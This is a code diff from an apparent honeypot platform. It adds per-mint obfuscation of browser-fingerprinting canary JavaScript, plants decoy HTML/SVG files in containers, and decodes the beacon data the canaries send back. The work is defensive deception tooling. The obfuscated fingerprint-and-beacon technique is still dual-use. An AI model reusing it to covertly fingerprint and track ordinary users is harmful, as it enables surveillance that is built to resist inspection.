|||||||
|
"""Per-mint JS obfuscator wrapper.
|
||||||
|
|
||||||
|
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
|
||||||
|
Used by the fingerprint generators / instrumenters to produce a unique,
|
||||||
|
hard-to-statically-analyse JS blob per canary mint.
|
||||||
|
|
||||||
|
Two design choices flow from the canary contract in :mod:`base`:
|
||||||
|
|
||||||
|
* **Determinism.** Generators must return byte-identical artifacts for
|
||||||
|
the same ``(callback_token, http_base, dns_zone, persona)``. We
|
||||||
|
derive a numeric seed from the callback token and pass it to the
|
||||||
|
obfuscator's own ``seed`` option, and we derive the polymorphic
|
||||||
|
config bits from the same hash so a re-mint reproduces exactly.
|
||||||
|
* **Per-mint uniqueness.** Two different callback tokens produce
|
||||||
|
structurally different output: different identifier names, different
|
||||||
|
string-array rotation, optionally different transforms enabled.
|
||||||
|
|
||||||
|
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
|
||||||
|
We pass code+options as JSON on stdin and read the obfuscated result
|
||||||
|
from stdout. Stderr surfaces obfuscator failures.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
import hmac
|
||||||
|
import json
|
||||||
|
import os
|
||||||
|
import subprocess # nosec B404 — Node helper exec is the whole point
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
|
||||||
|
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
|
||||||
|
|
||||||
|
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
|
||||||
|
# specific runtime; default to PATH lookup.
|
||||||
|
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
|
||||||
|
|
||||||
|
# Hard timeout for the obfuscator subprocess. Real runs on the
|
||||||
|
# fingerprint payload sit well under 5s on a dev box.
|
||||||
|
_TIMEOUT_S = 30
|
||||||
|
|
||||||
|
|
||||||
|
class ObfuscatorError(RuntimeError):
|
||||||
|
"""Raised when the Node helper fails or returns empty output."""
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintSecretMissing(RuntimeError):
|
||||||
|
"""Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
|
||||||
|
|
||||||
|
Fingerprint canaries embed a per-mint nonce derived from this
|
||||||
|
server-side secret; without it the worker cannot validate incoming
|
||||||
|
fingerprint beacons, so we fail loud at mint time rather than ship
|
||||||
|
a defeatable canary.
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
|
||||||
|
|
||||||
|
|
||||||
|
def nonce_for(callback_token: str, mint_uuid: str) -> str:
|
||||||
|
"""Compute the per-mint fingerprint nonce.
|
||||||
|
|
||||||
|
HMAC-SHA256 keyed on the server-side master secret, message is
|
||||||
|
``callback_token + "|" + mint_uuid``. Truncated to 16 hex chars
|
||||||
|
(~64 bits of entropy) — enough to defeat slug-only forgery while
|
||||||
|
fitting comfortably into a query string.
|
||||||
|
"""
|
||||||
|
secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
|
||||||
|
if not secret:
|
||||||
|
raise FingerprintSecretMissing(
|
||||||
|
f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
|
||||||
|
)
|
||||||
|
msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
|
||||||
|
return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
|
||||||
|
|
||||||
|
|
||||||
|
def _seed_from_token(callback_token: str) -> int:
|
||||||
|
"""Derive a 31-bit numeric seed from the callback token.
|
||||||
|
|
||||||
|
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
|
||||||
|
using a SHA-256-derived prefix gives us a uniform distribution
|
||||||
|
across the 31-bit positive range.
|
||||||
|
"""
|
||||||
|
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
|
||||||
|
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
|
||||||
|
|
||||||
|
|
||||||
|
def _config_from_seed(seed: int) -> dict[str, Any]:
|
||||||
|
"""Build a deterministic, per-mint obfuscator config.
|
||||||
|
|
||||||
|
The hash bits drive *which* transforms apply — two mints get
|
||||||
|
structurally different outputs, not just different identifier names.
|
||||||
|
Defaults stay aggressive enough that reverse engineering is real
|
||||||
|
work; we never disable string-array or rename, only vary the dial.
|
||||||
|
"""
|
||||||
|
bits = seed
|
||||||
|
encodings = ("base64", "rc4")
|
||||||
|
string_array_encoding = [encodings[bits & 1]]
|
||||||
|
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
|
||||||
|
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
|
||||||
|
transform_object_keys = bool((bits >> 17) & 1)
|
||||||
|
numbers_to_expressions = bool((bits >> 18) & 1)
|
||||||
|
simplify = bool((bits >> 19) & 1)
|
||||||
|
return {
|
||||||
|
"compact": True,
|
||||||
|
"seed": seed,
|
||||||
|
"controlFlowFlattening": True,
|
||||||
|
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
|
||||||
|
"deadCodeInjection": True,
|
||||||
|
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
|
||||||
|
"stringArray": True,
|
||||||
|
"stringArrayEncoding": string_array_encoding,
|
||||||
|
"stringArrayThreshold": 1,
|
||||||
|
"stringArrayRotate": True,
|
||||||
|
"stringArrayShuffle": True,
|
||||||
|
"splitStrings": True,
|
||||||
|
"splitStringsChunkLength": 4 + (bits & 7),
|
||||||
|
"transformObjectKeys": transform_object_keys,
|
||||||
|
"numbersToExpressions": numbers_to_expressions,
|
||||||
|
"simplify": simplify,
|
||||||
|
"selfDefending": False, # breaks SVG embed; not worth the cost
|
||||||
|
"renameGlobals": False,
|
||||||
|
"identifierNamesGenerator": "mangled-shuffled",
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def obfuscate(code: str, *, callback_token: str) -> str:
|
||||||
|
"""Obfuscate *code* deterministically per *callback_token*.
|
||||||
|
|
||||||
|
Raises :class:`ObfuscatorError` if Node fails or returns empty.
|
||||||
|
"""
|
||||||
|
seed = _seed_from_token(callback_token)
|
||||||
|
options = _config_from_seed(seed)
|
||||||
|
payload = json.dumps({"code": code, "options": options})
|
||||||
|
try:
|
||||||
|
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
|
||||||
|
[_NODE_BIN, str(_HELPER)],
|
||||||
|
input=payload, capture_output=True, text=True,
|
||||||
|
timeout=_TIMEOUT_S, check=False,
|
||||||
|
)
|
||||||
|
except FileNotFoundError as e:
|
||||||
|
raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
|
||||||
|
except subprocess.TimeoutExpired as e:
|
||||||
|
raise ObfuscatorError("javascript-obfuscator timed out") from e
|
||||||
|
if proc.returncode != 0:
|
||||||
|
raise ObfuscatorError(
|
||||||
|
f"javascript-obfuscator failed rc={proc.returncode} "
|
||||||
|
f"stderr={proc.stderr.strip()[:400]}"
|
||||||
|
)
|
||||||
|
out = proc.stdout
|
||||||
|
if not out.strip():
|
||||||
|
raise ObfuscatorError("javascript-obfuscator returned empty output")
|
||||||
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
def render_fingerprint_js(
|
||||||
|
*, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
|
||||||
|
) -> str:
|
||||||
|
"""Build the obfuscated fingerprint JS for a single mint.
|
||||||
|
|
||||||
|
Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
|
||||||
|
``{{MINT_NONCE}}`` in the payload template, then runs it through
|
||||||
|
:func:`obfuscate` with a seed derived from the callback token.
|
||||||
|
The nonce is appended as ``&k=`` on every beacon URL the JS emits;
|
||||||
|
the worker rejects fingerprint payloads whose ``?k=`` doesn't match
|
||||||
|
the row's :attr:`CanaryToken.fingerprint_nonce`.
|
||||||
|
"""
|
||||||
|
template = _PAYLOAD.read_text(encoding="utf-8")
|
||||||
|
beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
|
||||||
|
src = (
|
||||||
|
template
|
||||||
|
.replace("{{BEACON_URL}}", beacon)
|
||||||
|
.replace("{{MINT_UUID}}", mint_uuid)
|
||||||
|
.replace("{{MINT_NONCE}}", nonce)
|
||||||
|
)
|
||||||
|
return obfuscate(src, callback_token=callback_token)
|
||||||
10
decnet/canary/package.json
Normal file
10
decnet/canary/package.json
Normal file
@@ -0,0 +1,10 @@
|
|||||||
|
{
|
||||||
|
"name": "decnet-canary-obfuscator",
|
||||||
|
"version": "0.1.0",
|
||||||
|
"private": true,
|
||||||
|
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
|
||||||
|
"main": "_obfuscate_helper.js",
|
||||||
|
"dependencies": {
|
||||||
|
"javascript-obfuscator": "^5.4.2"
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
|
|||||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||||
|
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||||
|
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
_WINDOWS_DEFAULTS: dict[str, str] = {
|
_WINDOWS_DEFAULTS: dict[str, str] = {
|
||||||
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
|
|||||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||||
|
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||||
|
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
|
||||||
import base64
|
|
||||||
import os
|
import os
|
||||||
import shlex
|
from datetime import datetime, timedelta, timezone
|
||||||
import time
|
|
||||||
from secrets import token_urlsafe
|
from secrets import token_urlsafe
|
||||||
from typing import Any, Iterable, Optional
|
from typing import Any, Iterable, Optional
|
||||||
|
|
||||||
@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
|
|||||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||||
from decnet.canary.factory import get_generator
|
from decnet.canary.factory import get_generator
|
||||||
from decnet.canary.paths import default_path_for
|
from decnet.canary.paths import default_path_for
|
||||||
|
from decnet.decky_io import (
|
||||||
|
delete_file_from_container,
|
||||||
|
resolve_topology_container,
|
||||||
|
write_file_to_container,
|
||||||
|
)
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.web.db.repository import BaseRepository
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
log = get_logger("canary.planter")
|
log = get_logger("canary.planter")
|
||||||
|
|
||||||
_DOCKER = "docker"
|
|
||||||
_TIMEOUT = 8.0
|
|
||||||
# Container suffix — matches the orchestrator SSH driver's convention
|
# Container suffix — matches the orchestrator SSH driver's convention
|
||||||
# (``<decky_name>-ssh``). Canary placement always happens through the
|
# (``<decky_name>-ssh``). Canary placement always happens through the
|
||||||
# ssh container because every decky has one and it carries the most
|
# ssh container because every decky has one and it carries the most
|
||||||
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
|
|||||||
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
|
||||||
|
|
||||||
def _dirname(path: str) -> str:
|
# resolve_topology_container is re-exported from decky_io for back-compat
|
||||||
idx = path.rfind("/")
|
# with callers (tests, deploy hook) that imported it from this module
|
||||||
if idx <= 0:
|
# before the decky_io extraction.
|
||||||
return "/"
|
__all__ = [
|
||||||
return path[:idx]
|
"plant",
|
||||||
|
"revoke",
|
||||||
|
"resolve_topology_container",
|
||||||
async def _run(
|
"seed_baseline",
|
||||||
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
|
"seed_baseline_topology",
|
||||||
) -> tuple[int, str, str]:
|
]
|
||||||
try:
|
|
||||||
proc = await asyncio.create_subprocess_exec(
|
|
||||||
*argv,
|
|
||||||
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
|
||||||
stdout=asyncio.subprocess.PIPE,
|
|
||||||
stderr=asyncio.subprocess.PIPE,
|
|
||||||
)
|
|
||||||
except FileNotFoundError as exc:
|
|
||||||
return 127, "", f"argv[0] not found: {exc}"
|
|
||||||
try:
|
|
||||||
stdout, stderr = await asyncio.wait_for(
|
|
||||||
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
|
|
||||||
)
|
|
||||||
except asyncio.TimeoutError:
|
|
||||||
try:
|
|
||||||
proc.kill()
|
|
||||||
except ProcessLookupError:
|
|
||||||
pass
|
|
||||||
return 124, "", "timeout"
|
|
||||||
return (
|
|
||||||
proc.returncode if proc.returncode is not None else -1,
|
|
||||||
stdout.decode("utf-8", "replace"),
|
|
||||||
stderr.decode("utf-8", "replace"),
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
|
|
||||||
"""Compose the ``sh -c`` script + stdin payload for one artifact.
|
|
||||||
|
|
||||||
Binary safety: we base64-encode on the host and stream the result
|
|
||||||
over stdin to ``base64 -d`` inside the container, so the bytes
|
|
||||||
never touch the argv (kernel ARG_MAX would reject anything larger
|
|
||||||
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
|
|
||||||
and ``touch -d @<unix_ts>`` are present on every Linux base image
|
|
||||||
we ship, so there's no per-distro branching.
|
|
||||||
"""
|
|
||||||
encoded = base64.b64encode(artifact.content)
|
|
||||||
mtime = int(time.time() + artifact.mtime_offset)
|
|
||||||
mode_str = oct(artifact.mode)[2:]
|
|
||||||
parts = [
|
|
||||||
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
|
|
||||||
f"base64 -d > {shlex.quote(artifact.path)}",
|
|
||||||
f"chmod {mode_str} {shlex.quote(artifact.path)}",
|
|
||||||
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
|
|
||||||
]
|
|
||||||
return " && ".join(parts), encoded
|
|
||||||
|
|
||||||
|
|
||||||
async def _publish(
|
async def _publish(
|
||||||
@@ -139,6 +93,7 @@ async def plant(
|
|||||||
repo: Optional[BaseRepository] = None,
|
repo: Optional[BaseRepository] = None,
|
||||||
publish: bool = True,
|
publish: bool = True,
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> tuple[bool, Optional[str]]:
|
) -> tuple[bool, Optional[str]]:
|
||||||
"""Write *artifact* into the decky's ssh container.
|
"""Write *artifact* into the decky's ssh container.
|
||||||
|
|
||||||
@@ -157,13 +112,12 @@ async def plant(
|
|||||||
await repo.update_canary_token_state(token_uuid, "failed", err)
|
await repo.update_canary_token_state(token_uuid, "failed", err)
|
||||||
return False, err
|
return False, err
|
||||||
|
|
||||||
sh_cmd, stdin_payload = _build_plant_command(artifact)
|
target_container = container or _container_for(decky_name)
|
||||||
# ``-i`` keeps stdin attached so base64 -d inside the container can
|
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
|
||||||
# consume the encoded payload streamed from the host.
|
success, error = await write_file_to_container(
|
||||||
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
|
target_container, artifact.path, artifact.content,
|
||||||
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
|
mode=artifact.mode, mtime=mtime,
|
||||||
success = rc == 0
|
)
|
||||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
|
||||||
|
|
||||||
if repo is not None:
|
if repo is not None:
|
||||||
if success:
|
if success:
|
||||||
@@ -182,8 +136,8 @@ async def plant(
|
|||||||
|
|
||||||
if not success:
|
if not success:
|
||||||
log.warning(
|
log.warning(
|
||||||
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
|
"canary.plant failed decky=%s token=%s container=%s err=%r",
|
||||||
decky_name, token_uuid, rc, stderr[:120],
|
decky_name, token_uuid, target_container, error,
|
||||||
)
|
)
|
||||||
return success, error
|
return success, error
|
||||||
|
|
||||||
@@ -196,6 +150,7 @@ async def revoke(
|
|||||||
repo: Optional[BaseRepository] = None,
|
repo: Optional[BaseRepository] = None,
|
||||||
publish: bool = True,
|
publish: bool = True,
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> tuple[bool, Optional[str]]:
|
) -> tuple[bool, Optional[str]]:
|
||||||
"""Best-effort unlink + state transition + bus publish.
|
"""Best-effort unlink + state transition + bus publish.
|
||||||
|
|
||||||
@@ -203,11 +158,10 @@ async def revoke(
|
|||||||
the file is gone after the call (whether we deleted it or it was
|
the file is gone after the call (whether we deleted it or it was
|
||||||
already missing); only docker / container-down errors return False.
|
already missing); only docker / container-down errors return False.
|
||||||
"""
|
"""
|
||||||
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
|
target_container = container or _container_for(decky_name)
|
||||||
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
|
success, error = await delete_file_from_container(
|
||||||
rc, _stdout, stderr = await _run(argv)
|
target_container, placement_path,
|
||||||
success = rc == 0
|
)
|
||||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
|
||||||
|
|
||||||
if repo is not None:
|
if repo is not None:
|
||||||
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
||||||
@@ -250,6 +204,7 @@ async def seed_baseline(
|
|||||||
persona: str = "linux",
|
persona: str = "linux",
|
||||||
created_by: str = "system",
|
created_by: str = "system",
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> list[dict[str, Any]]:
|
) -> list[dict[str, Any]]:
|
||||||
"""Plant the configured baseline canary set on one decky.
|
"""Plant the configured baseline canary set on one decky.
|
||||||
|
|
||||||
@@ -293,9 +248,59 @@ async def seed_baseline(
|
|||||||
await plant(
|
await plant(
|
||||||
decky_name, artifact,
|
decky_name, artifact,
|
||||||
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
||||||
|
container=container,
|
||||||
)
|
)
|
||||||
out.append({
|
out.append({
|
||||||
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
||||||
"callback_token": slug, "placement_path": artifact.path,
|
"callback_token": slug, "placement_path": artifact.path,
|
||||||
})
|
})
|
||||||
return out
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
async def seed_baseline_topology(
|
||||||
|
repo: BaseRepository,
|
||||||
|
topology_id: str,
|
||||||
|
*,
|
||||||
|
created_by: str = "system",
|
||||||
|
bus: Optional[BaseBus] = None,
|
||||||
|
) -> list[dict[str, Any]]:
|
||||||
|
"""Plant baseline canaries on every decky in a MazeNET topology.
|
||||||
|
|
||||||
|
Mirrors :func:`seed_baseline` for the topology path. Container name
|
||||||
|
resolution uses :func:`resolve_topology_container` since topology
|
||||||
|
deckies may not have an ssh service — in that case we target the
|
||||||
|
base container instead.
|
||||||
|
|
||||||
|
Best-effort: failures on any single decky are logged inside
|
||||||
|
:func:`plant`; the deploy hook treats the return value as
|
||||||
|
informational. Returns a flat list of per-token dicts (with an added
|
||||||
|
``decky_name`` key) across all deckies.
|
||||||
|
"""
|
||||||
|
from decnet.topology.persistence import hydrate
|
||||||
|
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
log.warning(
|
||||||
|
"canary.seed_baseline_topology: topology %s not found", topology_id,
|
||||||
|
)
|
||||||
|
return []
|
||||||
|
|
||||||
|
out: list[dict[str, Any]] = []
|
||||||
|
for decky in hydrated["deckies"]:
|
||||||
|
cfg = decky.get("decky_config") or {}
|
||||||
|
decky_name = cfg.get("name") or decky.get("name")
|
||||||
|
if not decky_name:
|
||||||
|
continue
|
||||||
|
services = decky.get("services") or []
|
||||||
|
container = resolve_topology_container(topology_id, decky_name, services)
|
||||||
|
# MazeNET deckies don't carry an OS persona today; default to
|
||||||
|
# linux (every base image we ship is Linux).
|
||||||
|
rows = await seed_baseline(
|
||||||
|
decky_name, repo,
|
||||||
|
persona="linux", created_by=created_by, bus=bus,
|
||||||
|
container=container,
|
||||||
|
)
|
||||||
|
for r in rows:
|
||||||
|
r["decky_name"] = decky_name
|
||||||
|
out.append(r)
|
||||||
|
return out
|
||||||
|
|||||||
@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
|
import base64
|
||||||
|
import binascii
|
||||||
|
import json
|
||||||
import os
|
import os
|
||||||
|
import time
|
||||||
|
import uuid
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Any, Optional
|
||||||
|
|
||||||
from fastapi import FastAPI, Request, Response
|
from fastapi import FastAPI, Request, Response
|
||||||
|
|
||||||
@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# Namespace used by fingerprint generators to derive mint UUID.
|
||||||
|
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
|
||||||
|
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||||
|
|
||||||
|
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
|
||||||
|
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
|
||||||
|
# Not shared across worker restarts or processes — acceptable for MVP.
|
||||||
|
_FP_RATE_WINDOW_S = 60
|
||||||
|
_FP_RATE_LIMIT = 30
|
||||||
|
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
|
||||||
|
|
||||||
|
|
||||||
|
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
|
||||||
|
key = (token_uuid, src_ip)
|
||||||
|
now = time.monotonic()
|
||||||
|
cutoff = now - _FP_RATE_WINDOW_S
|
||||||
|
bucket = _fp_rate_buckets.get(key, [])
|
||||||
|
bucket = [t for t in bucket if t > cutoff]
|
||||||
|
if len(bucket) >= _FP_RATE_LIMIT:
|
||||||
|
_fp_rate_buckets[key] = bucket
|
||||||
|
return False
|
||||||
|
bucket.append(now)
|
||||||
|
_fp_rate_buckets[key] = bucket
|
||||||
|
return True
|
||||||
|
|
||||||
|
|
||||||
|
def _is_valid_fp_shape(fp: dict) -> bool:
|
||||||
|
"""Layer B — structural sanity check on a decoded fingerprint blob."""
|
||||||
|
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
|
||||||
|
return False
|
||||||
|
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
|
||||||
|
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
|
||||||
|
return present >= 3
|
||||||
|
|
||||||
|
|
||||||
def _http_base() -> str:
|
def _http_base() -> str:
|
||||||
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
||||||
|
|
||||||
@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
|
|
||||||
@app.get("/c/{slug}")
|
@app.get("/c/{slug}")
|
||||||
async def callback(slug: str, request: Request) -> Response:
|
async def callback(slug: str, request: Request) -> Response:
|
||||||
|
raw_nonce = request.query_params.get("k")
|
||||||
|
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
|
||||||
|
merged_headers = dict(request.headers)
|
||||||
|
if fp_meta:
|
||||||
|
merged_headers.update(fp_meta)
|
||||||
await _record_hit(
|
await _record_hit(
|
||||||
repo, bus,
|
repo, bus,
|
||||||
slug=slug,
|
slug=slug,
|
||||||
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
user_agent=request.headers.get("user-agent"),
|
user_agent=request.headers.get("user-agent"),
|
||||||
request_path=str(request.url.path),
|
request_path=str(request.url.path),
|
||||||
dns_qname=None,
|
dns_qname=None,
|
||||||
raw_headers=dict(request.headers),
|
raw_headers=merged_headers,
|
||||||
|
parsed_fp=parsed_fp,
|
||||||
|
raw_nonce=raw_nonce,
|
||||||
)
|
)
|
||||||
# Always 200 with a tiny image so the attacker's client sees
|
# Always 200 with a tiny image so the attacker's client sees
|
||||||
# a "success" — same return regardless of whether the slug is
|
# a "success" — same return regardless of whether the slug is
|
||||||
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
return app
|
return app
|
||||||
|
|
||||||
|
|
||||||
|
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
|
||||||
|
# overflow is handled via chunking (s/i/n + d). Anything larger than
|
||||||
|
# this on a single request is junk, so we drop it instead of letting an
|
||||||
|
# attacker inflate a trigger row indefinitely.
|
||||||
|
_FP_CHUNK_MAX = 8 * 1024
|
||||||
|
|
||||||
|
|
||||||
|
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
|
||||||
|
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
|
||||||
|
|
||||||
|
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
|
||||||
|
|
||||||
|
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
|
||||||
|
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
|
||||||
|
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
|
||||||
|
|
||||||
|
Returns a tuple of:
|
||||||
|
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
|
||||||
|
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
|
||||||
|
when there's no ``?d=`` or decoding fails.
|
||||||
|
"""
|
||||||
|
out: dict[str, Any] = {}
|
||||||
|
parsed_fp: Optional[dict] = None
|
||||||
|
if not qp:
|
||||||
|
return out, parsed_fp
|
||||||
|
o = qp.get("o") if hasattr(qp, "get") else None
|
||||||
|
if o:
|
||||||
|
out["_fp_open"] = "1"
|
||||||
|
d = qp.get("d") if hasattr(qp, "get") else None
|
||||||
|
if not d:
|
||||||
|
return out, parsed_fp
|
||||||
|
if len(d) > _FP_CHUNK_MAX:
|
||||||
|
out["_fp_oversize"] = "1"
|
||||||
|
return out, parsed_fp
|
||||||
|
|
||||||
|
sid = qp.get("s")
|
||||||
|
idx = qp.get("i")
|
||||||
|
total = qp.get("n")
|
||||||
|
if sid and idx and total:
|
||||||
|
out["_fp_sid"] = sid
|
||||||
|
out["_fp_idx"] = idx
|
||||||
|
out["_fp_total"] = total
|
||||||
|
out["_fp_chunk"] = d
|
||||||
|
return out, parsed_fp
|
||||||
|
|
||||||
|
# Single-shot: decode and pass back as parsed_fp; validation runs in
|
||||||
|
# _record_hit after token lookup so we have the stored nonce at hand.
|
||||||
|
try:
|
||||||
|
padded = d + "=" * (-len(d) % 4)
|
||||||
|
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
|
||||||
|
parsed = json.loads(raw.decode("utf-8"))
|
||||||
|
except (binascii.Error, ValueError, UnicodeDecodeError):
|
||||||
|
out["_fp_decode_error"] = "1"
|
||||||
|
return out, parsed_fp
|
||||||
|
if isinstance(parsed, dict):
|
||||||
|
parsed_fp = parsed
|
||||||
|
else:
|
||||||
|
out["_fp_decode_error"] = "1"
|
||||||
|
return out, parsed_fp
|
||||||
|
|
||||||
|
|
||||||
def _client_ip(request: Request) -> str:
|
def _client_ip(request: Request) -> str:
|
||||||
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
||||||
# proxy. Take the leftmost address in the chain; everything after
|
# proxy. Take the leftmost address in the chain; everything after
|
||||||
@@ -154,16 +262,58 @@ async def _record_hit(
|
|||||||
request_path: Optional[str],
|
request_path: Optional[str],
|
||||||
dns_qname: Optional[str],
|
dns_qname: Optional[str],
|
||||||
raw_headers: Optional[dict],
|
raw_headers: Optional[dict],
|
||||||
|
